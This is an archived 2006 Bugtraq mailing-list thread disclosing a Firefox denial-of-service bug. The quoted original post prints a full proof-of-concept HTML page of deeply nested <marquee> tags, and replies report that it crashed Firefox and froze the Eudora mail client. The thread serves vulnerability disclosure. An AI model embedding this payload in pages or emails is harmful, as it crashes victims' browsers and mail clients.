NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2006-05

RE: Fire fox dos exploit

From: Sanjay Rawat (sanjayrintoto.com)
Date: Sun Jun 04 2006 - 22:49:20 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I have seen that the exploit also freezes Eudora 6.2.1.2. I was trying to
open the original mail in Eudora mail client and whenever I clicked on the
the mail , Eudora stopped responding anymore. I had to restart the application.

regards
-Sanjay Rawat

At 09:52 PM 5/31/2006, Andy wrote:
>Crashed my FF 1.5.0.3 straight away on a fully patched XP Pro Service Pack 2
>
>Andy
>
>-----Original Message-----
>From: Josh Zlatin-Amishav [mailto:joshtkos.co.il]
>Sent: 31 May 2006 16:50
>To: co296aol.com
>Cc: bugtraqsecurityfocus.com
>Subject: Re: Fire fox dos exploit
>
>On Tue, 30 May 2006, co296aol.com wrote:
>
> > I have found a problem which causes denial of service on fire fox browser
>
>Can you give us some more details, like versions and platforms affected? I
>was unable to
>recreate this flaw using firefox 1.5.dfsg+1.5.0 on Debian unstable.
>
>--
> - Josh
>
> >
> > Creadit:to n00b for finding this bug..
> >
> > the problem lie's in the
> >
> > <marquee> html tag uses 100% cpu and crash's the browser..
> >
> > Following proof of concept available
> >
> > <html>
> > <head>
> > <title>Credit to n00b..</title>
> > <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
> > </head>
> >
> > <body>
> >
><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><mar
>quee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee
> ><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><ma
>rquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marque
>e><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><m
>arquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marqu
>ee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><
>marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marq
>uee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></
>marquee></marquee></marquee></marquee></marquee></marquee></marquee></marque
>e></marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma
>rquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marq
> ue
> >
>e></marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma
>rquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marq
>uee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
> > </body>
> > </html>
> >
> >

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]